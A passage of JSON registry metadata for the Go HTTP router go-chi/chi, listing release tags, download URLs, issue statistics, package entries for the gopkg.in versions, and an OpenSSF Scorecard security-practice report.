github/go-chi/chi@v4.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.2/manifests"},{"name":"v4.0.1","sha":"1a6bb108ccf279c8dac6f9bad857d773b4f9b421","kind":"commit","published_at":"2019-01-17T22:35:40.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.1","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"e95203758b2a6ec24a8e97124d5719ffe5ec1374","kind":"commit","published_at":"2019-01-10T15:56:14.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.0/manifests"},{"name":"v3.3.4","sha":"08d9051ef6546d57c5dca8eae13e6df362e2d568","kind":"commit","published_at":"2019-01-08T01:17:51.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.4","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.4/manifests"},{"name":"v3.3.3","sha":"b5294d10673813fac8558e7f47242bc9e61b4c25","kind":"commit","published_at":"2018-08-27T20:34:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.3","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.3/manifests"},{"name":"v3.3.2","sha":"e83ac2304db3c50cf03d96a2fcd39009d458bc35","kind":"commit","published_at":"2017-12-22T16:11:33.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.2","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.2/manifests"},{"name":"v3.3.1","sha":"687d2792aedd8e8ac3bbd8592cf55b91d7ea8ce9","kind":"commit","published_at":"2017-11-20T15:19:03.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.1/manifests"},{"name":"v3.3.0","sha":"f7c66f685bcab06bcce78ac212c5f3553c063d19","kind":"commit","published_at":"2017-10-10T22:11:38.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.0/manifests"},{"name":"v3.2.1","sha":"04ec7fc4179604b2390947258f9143eaae23b596","kind":"commit","published_at":"2017-09-01T02:07:29.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.2.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.1/manifests"},{"name":"v3.2.0","sha":"ba73ba0623af32e4e5f09880177e73bd78d98852","kind":"commit","published_at":"2017-08-22T17:58:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.2.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.0/manifests"},{"name":"v3.1.5","sha":"25354a53cca531cb2efd3f1d3c565d90ff04d802","kind":"commit","published_at":"2017-08-02T21:27:05.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.5","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.5/manifests"},{"name":"v3.1.4","sha":"b8567b6442e27704bfeb725095091581cbe82a00","kind":"commit","published_at":"2017-07-27T15:16:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.4","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.4/manifests"},{"name":"v3.1.3","sha":"524a020446146841512dd1639e736422e7af53a4","kind":"commit","published_at":"2017-07-25T17:24:32.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.3","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.3/manifests"},{"name":"v3.1.2","sha":"7e6b856011d49775bb45d829339287a416a85f66","kind":"commit","published_at":"2017-07-24T20:38:22.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.2","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.2/manifests"},{"name":"v3.1.1","sha":"12a98d329f12aac9e94b72c713437350c948a5e2","kind":"commit","published_at":"2017-07-21T14:22:28.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.1/manifests"},{"name":"v3.1.0","sha":"08660a0ad10a8fa7beab3ad43afe66373d49d06a","kind":"commit","published_at":"2017-07-10T19:19:16.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"967844826e58cf31213a7dfb82455d242ad85101","kind":"commit","published_at":"2017-06-21T19:28:24.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.0.0/manifests"},{"name":"v2.1.0","sha":"e6033ea75479391a4bce3918fc119cad31e1cb30","kind":"commit","published_at":"2017-03-30T18:41:17.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"54f435d539226571eab1987ed862b1c0fdfdc892","kind":"commit","published_at":"2017-01-06T20:47:52.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.0.0/manifests"},{"name":"v1.0.0","sha":"dcbb8f81eea01aaaa5b6f9bffc229e9e9e0256bb","kind":"commit","published_at":"2016-06-22T21:59:16.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.0.0/manifests"},{"name":"v0.9.0","sha":"c420d7fbf4428b27e31d83591e5e2267d84f9f20","kind":"commit","published_at":"2016-03-31T13:51:57.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v0.9.0","html_url":"https://github.com/go-chi/chi/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v0.9.0/manifests"}]},"repo_metadata_updated_at":"2026-08-08T10:51:35.232Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":1,"rankings":{"downloads":null,"dependent_repos_count":4.793834424600911,"dependent_packages_count":8.452778221382484,"stargazers_count":0.5152843137458235,"forks_count":0.913802650981726,"docker_downloads_count":null,"average":3.668924902677736},"purl":"pkg:golang/gopkg.in/chi.v3","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/gopkg.in/chi.v3","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/go/gopkg.in/chi.v3","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/gopkg.in/chi.v3/dependencies","status":null,"funding_links":["https://github.com/sponsors/pkieltyka"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-05T21:35:35.662Z","issues_count":173,"pull_requests_count":264,"avg_time_to_close_issue":12477255.268518519,"avg_time_to_close_pull_request":9586229.069148935,"issues_closed_count":108,"pull_requests_closed_count":187,"pull_request_authors_count":141,"issue_authors_count":161,"avg_comments_per_issue":3.098265895953757,"avg_comments_per_pull_request":0.9204545454545454,"merged_pull_requests_count":106,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":13,"past_year_pull_requests_count":81,"past_year_avg_time_to_close_issue":2306211.8,"past_year_avg_time_to_close_pull_request":2561033.4146341463,"past_year_issues_closed_count":10,"past_year_pull_requests_closed_count":41,"past_year_pull_request_authors_count":52,"past_year_issue_authors_count":12,"past_year_avg_comments_per_issue":1.6153846153846154,"past_year_avg_comments_per_pull_request":0.49382716049382713,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":13,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/issues","maintainers":[{"login":"pkieltyka","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pkieltyka"},{"login":"bigwheel","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bigwheel"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/gopkg.in%2Fchi.v3/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/gopkg.in%2Fchi.v3/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/gopkg.in%2Fchi.v3/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/gopkg.in%2Fchi.v3/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/gopkg.in%2Fchi.v3/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/gopkg.in%2Fchi.v3/codemeta","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":2263070,"maintainers_count":0,"namespaces_count":837425,"keywords_count":122443,"github":"golang","metadata":{"funded_packages_count":65362,"sync_missing_packages_cursor":{"timestamp":"2026-08-12T00:18:10.975284Z","path":"github.com/fhunleth/muontrap","version":"v0.2.1"},"rate_limit":1},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2026-08-12T12:33:12.528Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},{"id":3535687,"name":"gopkg.in/chi.v4","ecosystem":"go","description":"Package chi is a small, idiomatic and composable router for building HTTP services.","homepage":"https://github.com/go-chi/chi","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/go-chi/chi","keywords_array":[],"namespace":"gopkg.in","versions_count":11,"first_release_published_at":"2019-01-08T22:33:15.000Z","latest_release_published_at":"2023-09-07T09:47:57.000Z","latest_release_number":"v4.1.3","last_synced_at":"2026-08-12T02:06:17.442Z","created_at":"2022-04-10T23:48:51.157Z","updated_at":"2026-08-12T02:06:17.442Z","registry_url":"https://pkg.go.dev/gopkg.in/chi.v4","install_command":"go get gopkg.in/chi.v4","documentation_url":"https://pkg.go.dev/gopkg.in/chi.v4#section-documentation","metadata":{},"repo_metadata":{"id":37431049,"uuid":"44344606","full_name":"go-chi/chi","owner":"go-chi","description":"lightweight, idiomatic and composable router for building Go HTTP services","archived":false,"fork":false,"pushed_at":"2026-07-06T14:32:43.000Z","size":3855,"stargazers_count":22647,"open_issues_count":113,"forks_count":1143,"subscribers_count":202,"default_branch":"master","last_synced_at":"2026-08-08T05:52:46.865Z","etag":null,"topics":["api","context","go","golang","http","microservices","middleware","rest-api","router"],"latest_commit_sha":null,"homepage":"https://go-chi.io","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/go-chi.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"github":["pkieltyka"],"patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"otechie":null,"custom":null}},"created_at":"2015-10-15T20:46:29.000Z","updated_at":"2026-08-08T05:10:38.000Z","dependencies_parsed_at":"2024-02-17T01:25:55.324Z","dependency_job_id":"9318de72-9c7f-4385-92f6-00246e08d3a4","html_url":"https://github.com/go-chi/chi","commit_stats":{"total_commits":679,"total_committers":142,"mean_commits":4.78169014084507,"dds":0.6244477172312224,"last_synced_commit":"ef31c0bff3f8061e6fba7085691e4970a3d1b7da"},"previous_names":["pressly/chi"],"tags_count":59,"template":false,"template_full_name":null,"purl":"pkg:github/go-chi/chi","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/sbom","scorecard":{"id":431500,"data":{"date":"2025-08-11","repo":{"name":"github.com/go-chi/chi","commit":"23c395f8524a30334126ca16fb4d37b88745b9b9"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.7,"checks":[{"name":"Code-Review","score":8,"reason":"Found 25/30 approved changesets -- score normalized to 8","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Maintained","score":3,"reason":"4 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/ci.yml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":3,"reason":"dependency not pinned by hash detected -- score normalized to 3","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/go-chi/chi/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/go-chi/chi/ci.yml/master?enable=pin","Info:   0 out of   2 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of   1 goCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GO-2025-3770 / GHSA-vrw8-fxc6-2r93"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 29 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T03:27:31.106Z","repository_id":37431049,"created_at":"2025-08-19T03:27:31.106Z","updated_at":"2025-08-19T03:27:31.106Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36403979,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-08T02:00:08.763Z","response_time":96,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"go-chi","name":"go-chi","uuid":"29575368","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/29575368?v=4","repositories_count":17,"last_synced_at":"2023-02-26T15:55:10.593Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/go-chi","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-10T02:33:16.133Z","updated_at":"2023-02-26T15:55:10.598Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi/repositories"},"tags":[{"name":"v5.3.1","sha":"8b258c7bb28f97a5f2a856ff7ef962578fec9215","kind":"commit","published_at":"2026-07-05T18:51:45.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.3.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"3b171578ca44dfd75ca3c5cbddc7b44c600a7b49","kind":"commit","published_at":"2026-05-22T15:16:13.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.3.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.0/manifests"},{"name":"v5.2.5","sha":"05f1ef7bb50b8a8cb33a9dd3ba1c5b94bff0f723","kind":"commit","published_at":"2026-02-05T11:05:34.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.5","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.5/manifests"},{"name":"v5.2.4","sha":"6eb35881c0e438ffb663ddbad3a61babaa5e5d8a","kind":"commit","published_at":"2026-01-14T16:02:00.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.4","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.4/manifests"},{"name":"v5.2.3","sha":"9b9fb55def404397748a9fc7e044efe9db1d618e","kind":"commit","published_at":"2025-08-26T17:56:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.3","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.3","manifests_url"